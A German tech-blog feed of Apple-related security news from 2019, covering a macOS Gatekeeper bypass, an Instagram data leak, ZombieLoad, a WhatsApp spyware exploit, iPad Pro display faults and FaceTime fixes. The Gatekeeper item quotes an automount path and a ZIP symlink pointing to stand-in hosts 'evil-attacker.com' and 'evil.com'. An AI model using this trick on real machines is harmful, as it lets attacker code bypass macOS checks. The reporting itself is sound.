Der Sicherheitsexperte Filippo Cavallarin sorgte über das Wochenende für Aufsehen, indem er eine Schwachstelle im Gatekeeper von macOS öffentlich machte, mit der sich diese Sicherheitsfunktion umgehen lässt. Dies gilt auch nach dem in der vergangenen Woche veröffentlichten Update auf macOS 10.14.5. Zur Erinnerung: Der Gatekeeper sorgt in macOS dafür, dass aus dem Internet heruntergeladene Software unmittelbar auf ihre Herkunft geprüft und der Nutzer evtl. entsprechend gewarnt wird, sollte diese nicht vertrauenswürdig sein.

Laut Cavallarin kann diese Maßnahme jedoch komplett umgangen werden, was vor allem daran liegt, dass der Gatekeeper auch externe Festplatten und Netzlaufwerke pauschal als sichere Herkunftsorte einstuft. Dies bedeutet im Imkehrschluss, dass Software von diesen Orten nicht noch einmal auf ihre Sicherheit hin überprüft werden. Dem Sicherheitsforscher zufolge kann ein Nutzer jedoch relativ einfach in eine Falle gelockt werden, ein manipuliertes Netzlaufwerk zu mounten, von dem dann Software installiert werden kann, ohne dass der Gatekeeper hier eingreift.

So könnte mit dem Pfad "ls /net/evil-attacker.com/sharedfolder/" beispielsweise der Inhalt des Ordners "sharedfolder" auf einem entfernten Server mit der Adresse "evil-attacker.com" per NFS gemountet werden. Zudem können auch in ZIP-Archiven symbolische Links enthalten sein, die ebenfalls eine Möglichkeit bieten, den Gatekeeper zu umgehen. So könnte ein solcher Link beispielsweise auf "Documents -> /net/evil.com/Documents" lauten, wodurch sich der Nutzer nicht mehr auf seinem lokalen Rechner befände, sondern auf dem Ordner "Documents" auf dem Server von evil.com.

Cavallarin habe nach eigener Aussage Apple über die Sicherheitslücke am 22. Februar informiert und das Unternehmen wollte sie eigentlich mit mscOS 10.14.5 in der vergangenen Woche stopfen. Da das 90 Tage Fenster für die Geheimhaltung der Lücke inzwischen verstrichen ist und Apple auch nicht mehr auf E-Mails von Cavallarin reagiert, wurde sie nun öffentlich gemacht. Das nachfolgende Video zeigt sie in Aktion:

YouTube Direktlink

Anfang der Woche wurde bekannt, dass eine Datenbank mit persönlichen Informationen von Millionen von Instagram-Nutzern frei zugänglich auf einem Amazon-Server entdeckt wurde. Die Datenbank stammte offenbar von dem in Mumbai ansässigen Unternehmen Chtrbox, welches Instagram-Influencer dafür bezahlt, bestimmte Inhalte zu teilen. Allerdings sollen sich in der Datenbank auch Daten von Nutzern befinden, die nie mit dem Unternehmen zusammengearbeitet haben. Während sich Chtrbox zur Herkunft der Daten nicht äußern wollte, wurde nun eine Sicherheitslücke im Quelltext der Instagram-Webseite entdeckt, die ausgenutzt worden sein könnte, um eine solche Datenbank aufzubauen.

So hat der Sicherheitsforscher David Stier Anfang des Jahres ein Problem mit dem besagten Quelltext entdeckt, durch das persönliche Daten von Nutzern, darunter Telefonnummern und E-Mail Adressen einsehbar waren, auch wenn diese gar nicht hätten veröffentlicht werden sollen, wie Stier gegenüber CNET berichtet. Er hatte Instagram im Februar über seine Entdeckung informiert, woraufhin das Netzwerk im März ein entsprechendes Sicherheitspatch einspielte, welches das Problem behob. Bis zu diesem Zeitpunkt konnten allerdings schon entsprechende Datenbanken, wie beispielsweise auch die von Chtrbox genutzte, erstellt und in Umlauf gebracht worden sein. Instagram hat inzwischen angekündigt, sowohl die Entdeckung von Stier, als auch die Herkunft der Chtrbox-Daten weiter zu untersuchen:

"We're looking into the issue to understand if the data described - including email and phone numbers - was from Instagram or from other sources. We're also inquiring with Chtrbox to understand where this data came from and how it became publicly available."

Erneut wurde eine Sicherheitslücke in der Architektur von Intel-Prozessoren entdeckt, die bis in das Jahr 2011 zurückreicht. Auch in Macs von Apple sind diese Prozessoren zum Einsatz gekommen. Die neue Lücke, der die Sicherheitsforscher den Namen "ZombieLoad" gegeben haben, besteht aus vier Bugs, die von Angreifern genutzt werden können, um Daten direkt aus dem Prozessor des betroffenen Rechners abzugreifen, wie TechCrunch berichtet. Die Angriffsvektoren werden als genauso schwerwiegend beschrieben, wie auch die Meltdown- und Spectre-Sicherheitslücken, die Anfang vergangenen Jahres entdeckt wurden und für eine Menge Aufsehen gesorgt hatten. Die Sicherheitsforscher, die die neue (und teilweise auch die alten Lücken) entdeckt haben, beschreiben den Fehler in einem ausführlichen Whitepaper [PDF] und demonstrieren sie auch in einem YouTube-Video.

YouTube Direktlink

Von der ZombieLoad-Lücke sind so ziemlich alle mit einem Intel-Chip ausgestatteten Computer seit dem Jahr 2011 betroffen. AMD- und ARM-Chips sind dieses Mal hingegen nicht betroffen. Aktuell gibt es keine Hinweise darauf, dass die ZombieLoad-Sicherheitslücke bereits von Hackern ausgenutzt wurde und Intel hat bereits ein Korrektur-Update für das Problem ausgegeben. Apple soll angeblich bereits in den kommenden Stunden ein entsprechendes Update für alle betroffenen Macs veröffentlichen. Für den Mac ist ein entsprechender Patch bereits im gestern veröffentlichten macOS 10.14.5 enthalten. Auch Google und Microsoft sollen in Kürze nachziehen.

Laut Intel wirkt sich das Schließen der Lücke auf die Leistung des Prozessors aus, allerdings ist nicht klar, ob und inwieweit hiervon auch der Mac betroffen ist. Die Patches für Meltdown und Spectre hatten sich hier kaum spürbar ausgewirkt. Große Panik ist laut Daniel Gruss, einem der Entdecker von ZombieLoad ohnehin nicht angebracht. So sei die Lücke zwar leichter auszunutzen als Spectre, aber deutlich schwieriger als Meltdown, sodass ein Angreifer schon sehr spezifische Kenntnisse haben muss, um ZombieLoad ausnutzen zu können.

WhatsApp dürfte mit Sicherheit eine der am häufigsten genutzten Smartphone-Apps überhaupt sein. Umso wichtiger ist es, dass genau eine solche App möglichst immer auf dem aktuellsten Stand ist, um entdeckte Sicherheitslücken zu schließen. Dies gilt insbesondere auch für das in der vergangenen Nacht veröffentlichte Update der App. Wie sich herausstellte, war es nämlich möglich, Fernzugriff auf ein Gerät mit installiertem WhatsApp zu erlangen, indem man einen Anruf initiierte, den der angegriffene Nutzer nicht einmal annehmen musste. Geschlossen wurde diese Lücke mit dem Update aus der vergangenen Nacht, auch wenn WhatsApp hierauf in den Releasenotes mit keinem Wort eingeht.

Wie die New York Times berichtet, konnte die Lücke vor allem durch eine Spyware aus Israel genutzt werden, die eigentlich nur an Regierungsbehörden lizensiert und von diesen genutzt wird. Zu den Kunden des Entwickler-Unternehmens NSO gehören unter anderem die Vereinigten Arabischen Emirate, Saudi-Arabien und Mexiko. Sicherheitsexperten sind auf die aktuelle Lücke durch Angriffe auf einen Menschenrechtsanwalt aus Kanada gestoßen. Dieser hat offenbar verdächtige Video-Anrufe von norwegischen Telefonnummern erhalten, was ihn misstrauisch machte und entsprechende Maßnahmen einleiten ließ. Das Ergebnis entsprechender Analysen war eindeutig. Mit dem inzwischen veröffentlichten Update wird die Lücke aber geschlossen.

Eine wachsende Zahl von Nutzern eines iPad Pro aus den Jahren 2017 und 2018 beschwert sich offenbar über Probleme mit dem Display ihrer Geräte. Dies belegen zumindest verschiedene Einträge in den Apple Support Communities und den MacRumors Foren. Die betroffenen Nutzer beschreiben dabei Probleme mit nicht zuverlässig auf Toucheingaben reagierende Displays, ein Ruckeln beim Scrollen oder nicht registrierte Tastatureingaben. Apple scheint die betroffenen Geräte mehr oder weniger anstandslos auszutauschen, wobei verschiedene Nutzer berichten, dass auch ihr Ersatzgerät früher oder später die beschriebenen Probleme aufwies. Das nachfolgende Video zeigt das Problem in bewegten Bildern:

YouTube Direktlink

Derzeit ist unklar, ob es sich um ein Software- oder ein Hardwareproblem handelt. Zudem scheinen nicht alle in Umlauf befindlichen Geräte betroffen zu sein. Manche Nutzer berichten, dass die Probleme verschwinden, sobald der Apple Pencil 2 an das iPad Pro aus dem vergangenen Jahr angedockt ist, was auf ein mögliches Problem in der Verbindung zu dem Eingabestift hindeuten könnte. Apple selbst hat sich bislang noch nicht zu dem Problem geäußert. Betroffene Nutzer sollten sich jedoch an den Apple Support oder einen Apple Retail Store wenden, um dort möglicherweise ein Ersatzgerät zu erhalten.

Sicherheitsforscher aus Googles Project Zero Team haben offenbar bereits im vergangenen November eine schwere Sicherheitslücke im Kernel von macOS entdeckt, pflichtbewusst Apple darüber informiert (was heute ja leider keinesfalls mehr selbstverständlich zu sein scheint) und nach Ablauf der 90-tägigen Geheimhaltungs-Deadline nun Details zu ihr bekanntgegeben. Google zufolge gestattet es die Sicherheitslücke, ein vom Nutzer gemountetes Dateisystem-Image zu modifizieren, ohne dass der Nutzer hiervon etwas mitbekommt. Auf diese Weise kann man sich unter anderem Zugriff auf im Speicher befindliche Inhalte verschaffen.

Bisher hat Apple die Lücke offenbar noch nicht gestopft, soll dies aber für ein kommendes Softwareupdate planen. Die Sicherheitsforscher von Google unterstützen die Ingenieure von Apple derweil bei der Eindämmung des Problems. Bis dahin gelten die Grundregeln der sicheren Nutzung eines Computers, soll heißen: Keine dubiosen Dateien von unbekannten Webseiten herunterladen!

Mit dem Update auf iOS 12.1.4 wollte Apple eigentlich die schwere Sicherheitslücke in Gruppengesprächen über FaceTime behoben und die vorübergehend deaktivierte Funktion wieder aktiviert haben. Wie es aussieht, ist dies jedoch offenbar nicht komplett der Fall. So existiert inzwische ein längerer Foren-Thread bei den Kollegen von MacRumors, in dem Nutzer darüber berichten, dass sie derzeit keine neuen Benutzer zu einem 1-zu-1 Gespräch hinzufügen können. Der entsprechende Button bleibt in diesem Falle schlicht funktionslos. Die derzeit einzige Möglichkeit, Gruppengespräche zu führen und nach und nach weitere Nutzer hinzuzufügen ist, indem man ein Gruppengespräch mit mindestens drei Personen beginnt. Dies scheint Apple auch bereits bewusst zu sein, wenn man den folgenden Tweet mal als Beispiel nimmt.

Derzeit ist unklar, ob und wann sich Apple dieses Problems annimmt. iOS 12.2 befindet sich aktuell im Betastadium. In der letzten Version wurde der FaceTime-Bug allerdings noch nicht behoben, weswegen das Problem hier auch noch nicht nachgestellt werden kann. Ich würde aber mal davon ausgehen, dass Apple spätestens mit der finalen Version von iOS 12.2 die volle Funktionalität der FaceTime-Gruppengespräche wiederherstellen wird.

Das gestern Abend veröffentlichte Update auf iOS 12.1.4 behebt nicht nur die schwere Sicherheitslücke in FaceTime, die vergangene Woche öffentlich wurde, sondern bringt auch weitere Bugfixes mit. Unter anderem werden auch ein Problem mit Live Fotos in FaceTime und zwei Bugs aus Googles Project Zero Projekt behoben.Während FaceTime-Gruppentelefonate unter iOS 12.1.4 inzwischen wieder möglich sind, bleibt die Funktion für ältere iOS-Versionen serverseitig deaktiviert. Möchte man sie nutzen, muss zwangsweise ein Update durchgeführt werden. Auch in der letzten Betaversion von iOS 12.2 ist der Fehler noch nicht behoben und ein FaceTime-Gruppengespräch entsprechend nicht möglich. Apple entschuldigt sich in einem Statement gegenüber den Kollegen von MacRumors erneut für das Problem:

"Today's software update fixes the security bug in Group FaceTime. We again apologize to our customers and we thank them for their patience. In addition to addressing the bug that was reported, our team conducted a thorough security audit of the FaceTime service and made additional updates to both the FaceTime app and server to improve security. This includes a previously unidentified vulnerability in the Live Photos feature of FaceTime. To protect customers who have not yet upgraded to the latest software, we have updated our servers to block the Live Photos feature of FaceTime for older versions of iOS and macOS."

Wer sich für die Details der behobenen Sicherheitslücken in den gestern Abend veröffentlichten Updates interessiert, sei ein Blick in Apples offizielle Support-Dokumente zu iOS 12.1.4 und das ergänzende Update zu macOS 10.14.3 empfohlen.